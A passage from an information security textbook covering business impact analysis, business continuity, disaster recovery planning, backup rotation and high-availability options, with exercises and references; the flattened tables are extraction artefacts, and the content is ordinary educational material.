3. Assets and Threats. In your selected industry/major/specialty, list what you believe are the top 5 assets and top 5 threats. (If you are in the IT field, instead select an industry you may choose to work in, e.g., health, manufacturing, finance, retail, entertainment, education, hotel,…) 4. Qualitative Risk Analysis. Perform a Qualitative Risk Analysis, using a Vulnerability Assessment Quadrant Map, for your selected industry/major/specialty. Assume this organization is in your home town. Include the most important threats or threat categories listed in Step 2. Hint: Work with a copy of the Vulnerability Assessment Quadrant Map, provided in the Security Workbook. 5. Quantitative Risk Analysis. Complete a Quantitative Risk Analysis Table for five major threats in your industry/major/specialty. Find estimates for four asset values and/or likelihoods via searches on the Internet, and document these values, as well as the websites where you found them. Do your best at guessing remaining asset values and likelihoods. Show resulting ALE values. 6. Selecting Controls. For five major threats in your industry/major/specialty, discuss whether you would use risk avoidance, mitigation, transference, or acceptance for each, and why. Discuss a possible control for each, and describe whether the control is preventive, detective, or corrective. 7. Considering Ethics. In your industry/major/specialty, can you define an area where traditional risk assessment, with its focus on minimizing costs to the owner only, might be unethical? Describe the scenario, and how you might implement a risk strategy that protects all involved.

4.5.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Case study Analyzing risk

Health first case study √

Other resources Security workbook

References 1. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights 2. IBM (2021) Cost of a Data Breach Report 2021. IBM Security, Armonk 3. IBM (2022) Cost of a Data Breach Report 2022. IBM Security, Armonk 4. 2014 cost of data breach study: United States. (2014, May) Ponemon Institute LLC 5. Verizon (2022) 2022 data breach investigations report. Verizon http://www.verizon.com. 6. ISACA (2013) CRISC™ review manual 2013. ISACA, Arlington Heights

References

89

7. Gibson D (2011) Managing risk in information systems. Jones & Bartlett Learning, LLC, Burlington, pp 392–418 8. Pinto CA, Arora A, Hall D, Schmitz E (2006) Challenges to sustainable risk management: case example in information network security. Eng Manag J 18(1):17–23 9. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 101–104 10. Herkert JR (1994) Ethical risk assessment: valuing public perceptions. IEEE Technol Soc Mag 13(1):4–10 11. Asiata L-AB (2010) Technology, individual rights and the ethical evaluation of risk. J Inf Commun Ethics Soc 8(4):308–322 12. Kahn S (1986) Economic estimates of the value of life. IEEE Technol Soc Mag 5(2):24–31 13. Gibson D (2011) Managing risk in information systems. Jones & Bartlett Learning, Burlington, pp 101–102 14. Subramanyam KR, Wild JJ (2009) Financial statement analysis, 10th edn. McGraw-Hill Irwin, New York, pp 40–43 15. NIST (2012) NIST special publication 800-30: guide for conducting risk assessments, Rev. 1, National Institute of Standards and Technology, U.S. Dept. of Commerce 16. Verizon (2013) 2013 Data Breach Investigation Report. www.verizonenterprise.com.

Chapter 5

Addressing Business Impact Analysis and Business Continuity

It’s all fun and games when we are stealing each other’s money. When we are messing with a society’s ability to operate, we can’t tolerate it. – Sue Gordon, a former principal deputy director of national intelligence, speaking about the need to deter ransomware criminals, such as when targeting critical infrastructure: the Colonial Pipeline [1].

Consider a pharmacy with a failed centralized computer system. A person needs a critical prescription refilled immediately. His 24-h pharmacy’s computer system is down within the centralized network, which means that other stores in the chain also lack prescription information. Other pharmacies don’t have his prescription information, and the doctor’s office is closed. This person’s choice is visiting a hospital, hoping computer service resumes, or (at best) being miserable all night. This IT failure impacts organization sales and reputation, and may affect human life. This chapter is about Availability, or the lack of it: what happens to a business when the computer systems fail or cannot operate? Business Impact Analysis (BIA) determines how an IT disruption would affect an organization, including the financial, legal, liability, and reputation aspects, and sets business goals to minimize disruption. Business Continuity (BC) is about how ‘business continues’ in the face of IT disruption and selects the controls that should be used to achieve the Availability goals set in the BIA. The Disaster Recovery Plan is the detailed IT plan to provide a backup system when normal operation has failed. These topics usually have a direct impact on profitability, since loss of IT often leads to additional expenses and/ or loss of business profit. After the plan is in place, the plan must be tested. Figure 5.1 shows the steps taken in this chapter.

5.1 Business Impact Analysis IT outages will definitely occur. They may occur due to system failures (server, network, or disk failure), external/weather (storms, tornado, earthquake, fire, electric failure), hacker attack (malware, Distributed Denial of Service, penetration), and employee negligence or fraud (incompetence, error, revenge). The Business Impact Analysis is a document that considers the impact of IT failure on the business, how to minimize such failures, and which business © The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_5

91

92

5  Addressing Business Impact Analysis and Business Continuity

Fig. 5.1  Stages in business continuity

processes should be prioritized in the case of limited resources. What adversities could occur? What impact could an IT outage have on the organization financially? Legally? On human life? On reputation? Which business processes are of strategic importance? What is the necessary recovery time period? Key business managers should provide input regarding important business processes, potentially via meetings, interviews, and questionnaires.

5.1.1 Step 1: Define Threats Resulting in Business Disruption The first step in creating a Business Impact Analysis is to define problematic incidents or events that could occur. Disruptive events can be classified by the damage that is incurred and may be defined by the duration of downtime of critical business applications. Event Damage Classifications may include [10]: Event damage classification Crisis: Has a major material or financial impact on the business Major: Impacts one or more departments and may impact outside clients Minor: A non-negligible event with no material or financial impact on the business Negligible: No significant cost or damage (e.g.,: short term operating system crash)

Actions Alert senior management (and regulatory agencies if appropriate) Alert senior management Correct and log Log

Table 5.1 shows such an example impact classification for a university. In further BIA work, Negligible events can be ignored. However, Minor, Major, & Crisis events should be documented and their repairs should be tracked.

5.1  Business Impact Analysis

93

Table 5.1  Event damage classification for disruptive events (workbook exercise) Problematic event or Affected business incident process(es) Fire Class rooms, business departments Hacking intrusion Registration, advising, Network unavailable Registration, advising, classes Social engineering/ Registration fraud Server failure (disk/ Registration, advising, server) classes Loss of cloud Learning management Server room Classes, registration Power failure

Classes, all business processes

Impact classification & effect on finances, legal liability, human life, reputation Crisis. At times: Major Human life Major, Legal/liability: FERPA, PCI DSS Crisis during school year Major, Legal liability: FERPA, PCI DSS Major. At times crisis Crisis during school year; major at other times Crisis, but applications are prioritized by month Crisis during school year; major at other times

Fig. 5.2  Recovery timeline

When an IT or other disruption occurs, a prepared business implements an Alternate Mode, which is the set of business practices where some critical subset of service continues via a backup system (IT or otherwise). Less critical operations may be postponed, performed manually, or languish during this time. Figure  5.2 demonstrates how this occurs. Time proceeds from left to right. The regular service is interrupted by a misfortunate event. No service is provided during the Interruption Window, until the Disaster Recovery Plan is implemented to guide the transition to Alternate Mode [2]. Alternate Mode offers a lower level of critical business service, until problems can be resolved. The Restoration Plan helps to resolve critical issues and guide IT towards the resumption of regular service.

94

5  Addressing Business Impact Analysis and Business Continuity

Fig. 5.3 Organizational priorities for alternate mode

Corporate

Sales (1) Web Service (1)

Shipping (2)

Sales Calls (2)

Product A (1)

Orders (1)

Product B (2)

Inventory (2)

Engineering (3)

Product A (1)

Product B (2)

Product C (3)

5.1.2 Step 2: Define Recovery Objectives The next step in the BIA process is to identify which services cannot tolerate disruption and loss of transactions. The Service Delivery Objective (SDO) is the selected level of service for Alternate Mode [2]. Business expertise is required to determine the desired level of service during Alternate Mode. Figure 5.3 shows a hypothetical business scenario, where certain aspects of the organization (e.g., certain web sites, service departments, business departments) are ranked at higher priority than other departments. High priority IT processes will resume service in Alternate Mode, whereas lower ranked services’ resumption may be postponed. Maximum Tolerable Outage is the maximum time the business can endure staying in Alternate Mode. It is important to define what the maximum interruption window should be for each high priority service. The Recovery Time Objective (RTO) is the preferred duration of time between interruption and Alternate Mode implementation for each service. How long can your organization survive this service being down? This decision can depend on financial profit, liability, reputation, and other factors. Major issues can result if transactions are completed but are later lost, due to lack of backup. For example, customers may have paid for products, but before they get shipped, the organization loses the transactions. A second example is that you deposit money into a bank, but the deposit is lost. Lost data can occur when a disk fails or is destroyed or when a laptop or memory is lost or stolen – and there is no recent backup. The Recovery Point Objective (RPO) determines the amount of transaction data you can afford to lose if your server’s disk system fails. If you perform a backup of your main databases daily, the most data you will lose is 1 day. If you do weekly backups, you may lose 5–7  days of data. Some services cannot afford to lose any information following a disk/system failure, and should have an

5.1  Business Impact Analysis

95 Interruption

Recovery Point Objective

One Week

One Day

One Hour

Measures lost or ‘orphan’ data from before the interruption

Recovery Time Objective

One Hour

One Day

One Week

Measures lost processing time after the interruption

Fig. 5.4  Recovery time objective and recovery point objective

Table 5.2  Partial BIA summary for university (workbook exercise) Special notes (unusual treatment at specific times, unusual risk conditions) High priority during Nov–Jan, March–June, August Can operate manually for 2 days with loss of capability During school semester: high priority

Business process Registration

Recovery point objective (hours) 0 h

Recovery time objective (hours) 4 h

Critical resources (computer, people, peripherals) Registration DB, network registrar

Personnel

2 h

48 h

Personnel DB

Teaching

1 day

1 h

University web pages

1 week

1 h

Learning management, network, faculty files Web server Always critical RTO

RPO of 0  hours (h). If, for example, a computerized doctor’s office lost 1  day’s worth of doctor’s notes, the doctor would lose critical prescription and patient health information that he or she would likely not remember. A sales organization cannot afford to lose any critical orders. Any lost data is called Orphan Data. The best way to minimize orphan data is frequent backups to an alternate disk, system, or tape. For example, if the desired RPO is 1 day or 1 h, then backups should occur that frequently, respectively. Figure 5.4 shows how the RTO defines losses  due to computer time down of some service in the future, whereas the RPO defines lost transaction history for some amount of time in the past (i.e., since our last backup). For both RPO and RTO, a smaller loss of data or transactions is incurred when the RTO/RPO statistics are short or low, which is the preferred scenario. Table 5.2 then shows a partial workbook analysis of RTO and RPO for a university. In this example note that some functions, Registration and Teaching, vary in their criticality during certain days of the year. Also, in some cases having a low RTO is more important than a low RPO, and vice versa.

96

5  Addressing Business Impact Analysis and Business Continuity

The RTO decisions can help to categorize data into one of four Criticality Classes. We can define an associated preferred RTO for each class. For example, the Vital class’s ‘short time’ may be 1  day or 5  days, depending on organizational needs [10]. • Critical: Cannot be performed manually. Tolerance to interruption is very low. • Vital: Can be performed manually for a short time. • Sensitive: Can be performed manually for a period of time, but may cost more in staff. • Nonsensitive: Can be performed manually for an extended period of time with little additional cost and minimal recovery effort. Information in the Critical and Vital Criticality classes are considered sufficiently important that they should be addressed by the Business Continuity process. We will also use this classification data in the later chapter on Information Security.

5.2 Step 3: Business Continuity: Plan for Recovery Business Continuity is the business plan to offer critical services in the event of a disruption. The Business Continuity Plan (BCP) is the detailed business plan that takes the BIA results and describes the solution for how business should continue when a disaster strikes, called the business continuity of operation and a business resumption plan. This also includes the systems covered, personnel responsibility, contact information, transportation plan, evaluation plan, and emergency relocation plan. The Disaster Recovery Plan (DRP) is the detailed IT plan/procedure to guide IS systems recovery to Alternate Mode after an incident occurs. Both plans should be tested preferably on an off time, such as a weekend [10]. Different technical solutions can help to achieve different RTO and RPO values, including high-availability solutions, recovery sites, and cloud solutions. This section evaluates these alternatives. An organization should attempt to minimize its losses following an IT failure, by never paying more for recovery than is lost in income due to the failure. Minimal loss is achieved when the price of recovery matches the lost income. Types of recovery can be classified and backup facilities vary in cost depending on the configuration and access agreement. Options include [2]: • Mirror Site: High availability using a remote site provides redundancy and continual transaction backup. • Hot Site: The backup site is fully configured with equipment and networks. Software needs to be reloaded, but can be operational in hours. • Warm Site: The backup site usually has network and disk drives, but may lack sufficient servers for immediate use. • Cold Site: This backup site has electrical wiring and air conditioning, but no IT network or other equipment. It may take weeks to fully configure.

5.2  Step 3: Business Continuity: Plan for Recovery

97

5.2.1 Recovery Sites As part of the BIA process, the Recovery Time Objective and Service Delivery Objective are carefully considered for which services should be brought up in Alternate Mode and how quickly. A recovery site solution does not utilize active redundancy, but instead a backup plan. If a first site fails, a planned second site is configured and brought up. The recovery (RTO) can take hours, days, or weeks. Backup sites can exist within a sizeable organization, between cooperating organizations, or with a commercial backup site provider. Here are some options [2]: Cloud Services: Cloud services can be configured to host data with redundancy as a recovery or mirrored site and can serve as a backup or mirror site if data is hosted internally. The chapter on Alternative Networks discusses cloud implementations. Duplicate Information Processing Facility (IPF): Your organization has two sites or subsidiaries. Processing normally occurs locally, but could occur remotely if the local site failed. This technique can operate as a recovery site or a mirrored site. Reciprocal Agreement: Your organization has an agreement with another organization that enables either of you to use each other’s IT facilities, if either IT facilities fail. This option comes with additional issues such as quick access, security, IT compatibility, limited processing resources, priority, and other common issues when attempting to live with strangers. It is recommended to test in advance of a failure, and contractually agree on the access mechanism and maximum duration for such a combined living arrangement. Mobile Site: A trailer can be brought to your site to serve as a hot or warm site. The trailer may be pre-configured with satellite or microwave communication links. Einstein University uses in-house IT for vital and major applications, but a cloud service for 24/7 critical applications, such as learning management. Table 5.3 on RPO Controls lists the RPO value for each business process (taken from Table 5.2) and describes how the RPO is attained in the Special Treatment column. High-priority Critical and Vital business processes are further elaborated in Table 5.4, which includes the required procedures and documents to support business continuity. These procedures should be written by technical staff in Section 5 of the Security Workbook.

5.2.2 High-Availability Solutions High availability solutions use redundancy to minimize failures, enabling an RPO and RTO of seconds or minutes. Figure 5.5 shows various high availability options for processing, file services and networks. Needless to say, the in-house options may also be available in the cloud.

5  Addressing Business Impact Analysis and Business Continuity

98

Table 5.3  RPO controls (workbook exercise) Business process Teaching

RPO (hours) 1 day

Data file and system/ directory location Faculty servers & computers

Learning management Registration

0 h

Cloud

0 h

Registration DB Data center

Personnel

2 h

Personnel DB Data center

Web service

1 week

Data center

Special treatment (backup period, RAID, file retention strategies) Faculty servers are backed up daily Recommendation: when faculty uses PCs, faculty should save files on both PC and server Classes are cancelled during extreme weather (for student protection) Cloud system with mirrored redundancy RAID provides disk redundancy Server is backed up daily, stored offsite Use mobile site for outages >3 days RAID provides disk redundancy Server is backed up daily, stored offsite Use mobile site for outages >3 days Server is backed up weekly, stored offsite

Table 5.4  Business continuity summary for critical and vital classes (workbook exercise) Criticality class (critical or vital) Vital

Business process Registration

Critical

Teaching

Procedure for handling Incident or problematic (name the procedure if extended, event(s) describe steps if short) Computer failure DB backup procedure DB recovery procedure – registration Mobile site plan Computer failure Cloud services with mirrored redundancy

Active-Active Cluster Processing

File Servers

Active Passive Cluster RAID Storage Array

High Availability

Big Data Network

Diverse Routing Alternate Routing

Cloud

Fig. 5.5  High availability options

5.2  Step 3: Business Continuity: Plan for Recovery

99

A cluster is a set of servers running similar software, to survive one (or possibly more) failures [10]. They are used for processing, and within file systems and network equipment. An active-active cluster would involve two or more processors processing different transactions simultaneously. Active-active clusters are used in load sharing, where two or more processors share the work. If one processor fails, another processor will recover its transactions. An advantage of this configuration is scalability, where servers can be added to help share an increased load. One requirement is that all servers in the cluster share storage. In an active-passive cluster, a passive processor takes over if the active processor fails. An advantage of this method is that the standby can be local or located remotely and may have shared or replicated storage. Clusters can also span a city: metro-cluster, or the earth: geo-cluster, which may be beneficial for large organizations. Example solutions for disk systems and networks include [2]: Redundant Array of Independent Disks (RAID): An array of disks supports redundancy, often via parity. If one disk fails, the remaining disks can deduce the missing information. This relatively inexpensive and popular disk solution is located at one site. If multiple disks fail (e.g., through fire, flood, theft, bad luck) little recovery can be made, except by maintaining off-site backups. Fault-Tolerant Servers: If a primary server fails, a local backup server will resume service (active-passive clustering). An alternative mode includes Distributed Processing: a load is distributed over multiple servers (active-active clustering). If one server fails, the remaining server(s) attempt to carry the full load. This model is frequently used for high volume web processing and/or firewalls. Storage Array: A storage array is a large disk network that can support remote backups, data sharing and data migration between different geographical locations. If one site fails, recovery at a second site is possible. A storage array may perform replication via hardware or software and may operate in synchronous or asynchronous modes. In synchronous mode, a write completes when both sites confirm the transaction. In asynchronous mode, replication occurs on a periodic, scheduled basis. An adaptive mode alternates between synchronous and asynchronous, depending on current load [10]. Network redundancy: Redundant networks of the same or different types can survive network equipment or link failures. Networks can detect failures and reconfigure automatically via sophisticated routing protocols such as OSPF or EGRP. Solutions are shown in Fig. 5.6 and include [10]: • Diverse Routing: One network type (e.g., fiber or radio) supports multiple routes. • Alternative Routing: Two network types, often with different network providers, enable redundancy. This may be implemented over the long-haul (long distance) or last-mile (the local connection between your site and your communications provider). Big Data databases, such as Hadoop and Mongo, also qualify as high availability systems. This system type is described in an Advanced section of this chapter.

100

5  Addressing Business Impact Analysis and Business Continuity

Fig. 5.6   Network redundancy

5.2.3 Disk Backup and Recovery Backups are critical regardless of the type of Business Continuity solution used. Employee error, disk failures, and/or malware may corrupt disks, requiring recovery from backup. Even an on-line, redundant database backup can be corrupted via error or malevolence, requiring recovery from a historical copy. Multiple copies of historical databases should be retained, because it is sometimes necessary to reload a specific previous version in order to retrieve a deleted file or track fraud or a security attack. In addition, ransomware may corrupt backups (in addition to encrypting disks) to help convince you to pay their ransom [4]. Thus, it is important to not only perform backups, but regularly ensure backups are functional. One method of performing backups is the Grandfather-Father-Son method, which rotates recent monthly, weekly, and daily backups, respectfully [3]. At the ‘son’ level, seven backups are retained daily. The backup for the last day of each week graduates to the ‘father’ level, where five backups are retained for each week in the last month. The last week of each month graduates to the ‘grandfather level’, where 12 or more monthly backups may be retained. An example of this is shown in Fig. 5.7; however, any father level can be retained in disk or tape form. Backups may be complete backups of a database, or can be a partial backup, listing only the changes from the last backup. Partial backups may be Differential, which saves all changes since the last complete backup, or Incremental, which saves all changes since the last partial backup [3, 5, 10]. Figure 5.6 shows an example, where Monday and Friday have full backups, while Tuesday through Thursday have only partial backups. If a reload must occur on Thursday, and Differential is used, Monday then Wednesday’s backups are both reloaded. If Incremental backup is used, Monday, Tuesday and Wednesday must all be reloaded. In the Grandfather-­ Father-­Son solution, it is assumed that the Father and Grandfather levels are complete backups (Table 5.5).

101

5.3 Step 4: Preparing for IT Disaster Recovery

Fig. 5.7  Grandfather-father-son backup rotation

Table 5.5  Types of backup Daily events Monday: Full backup Tuesday: A changes Wednesday: B changes Thursday: C changes Friday: Full backup

Full Mon. Tues. Wed. Thurs. Fri.

Differential Monday Saves A Saves A + B Saves A + B + C Friday

Incremental Monday Saves A Saves B Saves C Friday

Backups must be properly labeled and tracked. Labels should include: data set name, volume serial number, date created, offsite storage bin number and possibly accounting period [3]. The backup retention time should be specified by policy and implemented carefully [10]. Backups should be kept off-site in a library. The library should maintain a detailed inventory of storage media and files. The library site should be sufficiently far away from the main computing center to avoid being affected by any common disaster. The library should be equally secure as the main computing center and to avoid notice should not be labeled. The library should have constant environmental control (humidity-, temperature-controlled, UPS, smoke/water detectors, and fire extinguishers) [10].

5.3 Step 4: Preparing for IT Disaster Recovery Figure 5.8 shows how an organization should respond to a disaster. This activity diagram is like a flow chart, where tasks normally occur in order (when you follow the arrows), but the tasks to the right of the thick middle vertical bar happen in parallel. First priority is human life and evacuating people as necessary. When there is a

102

5  Addressing Business Impact Analysis and Business Continuity

Fig. 5.8  Disaster response

security committee, anyone on that committee can declare a disaster. A pre-­ established protocol determines what constitutes a disaster and how a security officer should react. The protocol should include using a phone tree to notify participants. IT follows the Disaster Recovery Plan to implement Alternate Mode. The public relations department is responsible for any press release, and legal counsel should advise as to liability, as appropriate. Management should be well-informed to make any critical decisions, including potential resource allocation decisions. The Disaster Recovery Plan (DRP) should guide this effort for IT [10]. A full Disaster Recovery Plan should include: pre-incident readiness; a description of how to declare a disaster; evacuation procedures; allocation of responsibilities and contact information; step-by-step procedures for disaster recovery and Alternate Mode operation; and required resources for recovery and continued operations. The DRP should consider details such as: How will the Alternate Mode site be staffed? How will applications, operating systems, databases, networking, and security be brought up and functional? Copies of the DRP must be in hard copy off-site, available where it will be needed. Contact information should be accessible for general business needs and include first responder numbers for fire, police, and emergency health; business recovery including legal, supplies, damage assessment, and salvage; people assistance including training and transportation/relocation (for people and/or equipment). Contact information for technology needs include: incident response team, software/hardware vendors, insurance, recovery facilities, suppliers, and offsite media. Contact information should include name, address, email and phone information. To ensure a speedy recovery, a crisis should be simulated by testing the business continuity plan before a failure or real crisis actually occurs. Testing should start with easy, partial tests, and proceeding up to full, complete tests [2]. A good first test

5.3  Step 4: Preparing for IT Disaster Recovery

103

is the Desk-Based Evaluation/Paper Test, where a group steps through a paper procedure and mentally performs each step. The next step is a Preparedness Test, where part of a full test is performed on real systems. Different aspects should be tested regularly. One example would be a disk failure, which would require a recovery-­from-backup implementation. The Full Operational Test is a simulation of a full disaster, with a complete implementation of Alternate Mode. Doing some of these tests may result in problems; thus, the higher the level of test, the higher the management approval [10]. Testing for IT’s disaster recovery may include additional types of tests, including [5, 10]: • Checklist Review: Reviews coverage of plan  – are all important concerns covered? • Structured Walkthrough: Reviews all aspects of plan, often walking through different scenarios • Simulation Test: Execute plan based upon a specific scenario, without alternate site • Parallel Test: Bring up alternate off-site facility, without bringing down regular site • Full-Interruption: Move processing from regular site to alternate site. Metrics analyzed after IT testing may include measurements of time duration to transition to alternate mode, amount of data processed, accuracy of processing, and percent of systems functional in alternate mode [10]. A plan for testing would define when to perform which tests and the objectives of each test. Teams should be encouraged to work from the plan and not from memory, and to document their actions along the way [2]. Three test stages are recommended [10]: 1. Pre-Test: The test is set up. During Pre-Test, the staff may be prepared and equipment (e.g. for alternate off-site facility) set up. 2. Test: The test occurs. 3. Post-Test: Consists of analysis, cleanup and improvement. Post-test analysis includes calculating metrics, such as the time required to complete the test, the percent success rate in processing, and the ratio of successful transactions in Alternate versus normal mode. Cleanup involves returning resources and deleting any test data. Improvement incorporates updating the disaster response plans and test plans. As each test is executed, it should be evaluated for improvements. Both test and DRP procedures can potentially be improved. What went wrong? How can the procedure be completed faster? What needs to be corrected in the procedure? An internal auditor (or other third party) can help by observing and documenting what occurred. This documentation is useful during the analysis process and in external audits. As a result of testing, a gap analysis defines where the organization currently performs, compared to the desired level of performance. To achieve the desired

104

5  Addressing Business Impact Analysis and Business Continuity

level, improvements may require additional equipment or staff involvement, and better training and communication. To summarize this chapter, the BIA-BC process is: Perform a Business Impact Analysis, which prioritizes services to support critical business processes. Define an Alternate Processing Mode to support these Critical and Vital services following a disruptive event. Develop a Business Continuity Plan to support business operations during this recovery period. Develop a Disaster Recovery Plan which guides IT systems recovery into an Alternate Mode. Test the plans to ensure they are functional and will work. Periodically maintain the plans, to ensure that they adapt as the business changes.

5.4 Advanced: Business Continuity for Mature Organizations Sophisticated organizations that rely heavily on IT should monitor availability metrics, extend documentation, consider purchasing insurance, and prepare with additional testing. Monitoring availability/reliability rates can determine whether IT is meeting business goals for availability. Businesses advertise their availability as ‘24/7’ for 24 h a day, 7 days a week. Some strive to be (for example) a 5 9’s service, which means the service is up and available 99.999% of the time. Figure 5.9 demonstrates a reliability metric, which measures the average time a device may successfully run until failure (Mean Time To Failure – MTTF), and the average time it takes to fix it (Mean Time To Repair – MTTR). Mean Time Between Failure (MTBF) is the average of the sum: MTTF+MTTR. Multiple Business Continuity Plans may be useful for large organizations, as shown in Table 5.6 [3]. The three IT plans are shown in the middle column, and include the Disaster Recovery Plan, IT Contingency Plan, and Cyber Incident Response Plan. The Incident Response chapter describes this third plan at length. Business plans (right column) include event handling plans to handle aspects of a crisis, and business continuity plans, which describe business operations in a survival (Alternate) mode.

Fig. 5.9 MTBF = MTTF + MTTR

5.4  Advanced: Business Continuity for Mature Organizations

105

Table 5.6  Plans associated with business continuity Focus Event recovery

IT-focused Disaster recovery plan Procedures to recover at alternate site IT contingency plan Recovers major application or system Cyber incident response plan Handles malicious cyber incident

Business continuity

Business-focused Business recovery plan Recover business after a disaster Occupant emergency plan Protect life and assets during physical threat Crisis communication plan Provide status reports to public and personnel Business continuity plan Operate business in alternate mode Continuity of operations plan Longer duration outages

Table 5.7  Types of business continuity insurance Information processing facility (IPF) and equipment Business interruption: Loss of profit due to IT interruption Extra expense: Extra cost of operation following IPF damage

Data and media Valuable papers & records: Covers cash value of lost/damaged paper & records Media (software) reconstruction: Cost of reproduction of media

Employee Damage Fidelity coverage: Loss from dishonest employees Errors & omissions: Liability for error resulting in loss to client

IS Equipment & Facilities: Loss Media transportation: of IPF & equipment due to Loss of data during transport damage. Cybersecurity: coverage for cyber-attacks. Professional/Commercial Liability: Covers third-party claims of losses 

Table 5.7 shows different types of insurance that can help contain major expenses due to a disaster, categorized by protection type: to the Information Processing Facility (IPF), data and media, or employee damage [[10] with two additional rows, shown below]. Auditors of business continuity should investigate a number of issues [3]. Are documents (BIA/BC/DRP) complete, fully featured, well detailed, accurate, in-line with business goals, and current? Is it clear who is responsible for what in BC/DRP plans, and are they happy, trained, and competent in their jobs? Is the backup site properly maintained and fully functional? Were DRP test plans executed, results

106

5  Addressing Business Impact Analysis and Business Continuity

analyzed, and corrections made? Is the BCP phone tree current, and do BC/DRP people have copies of required documents off-site? If used, does the hot site have correct copies of software? Internal and external auditors may use these questions to ensure preparedness.

5.5 Advanced: Considering Big Data Distributed File Systems Reliability can be provided using Big Data databases, which are quick-access distributed databases that can handle large volumes of data: terabyte and petabyte databases. The advantages of the big data databases discussed here include their horizontal scalability, which enable easy expansion by adding commodity servers, and replicated servers, which automatically allocate and store data across multiple servers [6, 7]. However, these databases are noSQL servers; they only support the equivalent of a subset of SQL commands and queries. They do not support SQL joins, for example. Also, while they are great at reliability, they are not known for their confidentiality or integrity security features. Therefore, these aspects must be carefully considered, when necessary. This section considers two popular databases: Hadoop and MongoDB. Hadoop is a popular database to support Big Data [8]. It is designed for large volumes, quick access, complex data mapping, and reliability through redundancy. Hadoop is an Apache distributed database, which replicates and distributes its data across multiple locations, and reconfigures itself automatically, following a failure. It can be built with standard hardware. Hadoop’s two main components are MapReduce and the Hadoop Distributed File System (HDFS), which originated with Google versions. MapReduce handles requests for data operations, which are managed by a Job Tracker across nodes/clusters as requests. The HDFS consists of Name Nodes, which track where information resides, and Data Nodes, which actually contain the data. Both Job Trackers and Name Nodes achieve reliability by relaunching requests and redistributing data respectively, following a failure in communication to any node. Sometimes Hadoop is used as a backend database, with MySQL or HBase used as a front-end interface. MySQL supports SQL queries to handle complex queries, but is slow in a high-volume big data environment. HBase is a noSQL server supporting scalability and reliability through redundancy [9]. HBase uses a log-­ structured merge (LSM) tree to track data, which offers improved performance over Hadoop alone, when a high portion of transactions are inserts and/or random access requests. HBase also offers additional query and analysis capabilities beyond MapReduce, but less than MySQL. MongoDB is a free document-oriented database that is used by MTV, Forbes, NY Times and Craigslist [6]. The NY Times uses MongoDB to rapidly store and retrieve photos. It orders groups of items into ‘collections’, which can be retrieved

5.6 Questions

107

by collection name. These collections can then be sorted and filtered depending on specific field names, such as ‘lastname’. Commands to access the database include: insert/save, find, update, remove, and drop, where each is executed as a function call passing record fields’ name and value pairs, and can include comparison attributes. MongoDB is faster than traditional databases for larger batches of data, but cannot perform complex data joins.

5.6 Questions For each of the following questions, be sure to write professionally in typed, essay form. 1. Vocabulary. Match each meaning with the correct vocabulary name. Alternate mode Sensitivity class Criticality class Active-active cluster

Disaster recovery plan Interruption window Business impact analysis Active-passive cluster

Recovery point objective Incident response plan Recovery time objective Storage Array



(a) A level of partial IT service provided as a backup mode, following a major IT failure and emergency recovery. (b) The duration of no service following an IT failure. (c) Following a major IT failure, IT uses this backup plan to resume a partial level of service. (d) The determination of which IT business functions are most critical to the organization. (e) The amount of information that can be lost, following an IT failure; equivalent to lost data since last backup. (f) The permitted amount of time a business function may be nonoperational following an IT failure. (g) A set of categories delineating the criticality of business functions. (h) A high-availability processing solution, where processing happens in multiple servers simultaneously enabling load sharing. (i) A high-available processing solution, where a standby takes over when a primary processor fails. (j) A high-availability storage solution that enables synchronous and/or asynchronous transaction updates with remote sites. 2. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region and is NOT a university. You may use the Security Workbook (at https:// sn.pub/lecturer-material), Business Continuity Chapter to complete the tables. For each table, include at least four business processes.

108



5  Addressing Business Impact Analysis and Business Continuity

(a) Create an Impact Classification table, similar to Table 5.1. (b) Create a BIA table, similar to Table 5.2. (c) Create a RPO Controls table, similar to Table 5.3. (d) Create a BC Overview table, similar to Table 5.4

3. Procedure Development. Write a backup/recovery procedure for your computer’s data that will enable anyone with your procedure to accomplish the operation. A procedure is a step-by-step description of how to perform an action (similar to the Security Workbook). You may save data to a DVD or electronic drive. Answer the following questions in your Backup procedure: How do you initialize the backup? How do you label the backup? What data will you move, where is that data, and how do you move it? What problems might occur and how should they be handled? Also prepare a similar Recovery procedure, indicating how to reload from backup.

5.6.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Case study Addressing business impact analysis and business continuity

Health first case study ✓

Other resources Security workbook

References 1. NYTimes (2021) Quotation of the day: pipeline hack reveals seams in nation’s cybersecurity armor. NY Times, May 14 2. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights 3. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 121–132, 295–305 4. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise. com/DBIR/2013. Accessed 20 Oct 2013 5. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New  York, pp 885–972 6. Boicea A, Radulescu F, Agapin LI (2012) MongoDB vs Oracle – database comparison. In: Third international conference on emerging intelligent data and web technologies. IEEE, pp 330–335. http://ieeexplore.ieee.org 7. Vora MN (2011) Hadoop–HBase for large-scale data. In: International conference on computer science and network technology (ICCSNT), vol 1. IEEE, pp. 601–605. http://ieeexplore. ieee.org

References

109

8. Singh K, Kaur R (2014) Hadoop: addressing challenges of big data. In: IEEE international advance computing conference (IACC). IEEE, pp 686–689. http://ieeexplore.ieee.org 9. Ding H, Jin Y, Cui Y, Yang T (2012) Distributed storage of network measurement data on HBase. In: IEEE 2nd international conference on cloud computing and intelligent systems. IEEE, pp 716–720. http://ieeexplore.ieee.org 10. ISACA (2019) CISA review manual, 27th edn. ISACA, Arlington Heights

Chapter 6

Governing: Policy, Maturity Models and Planning

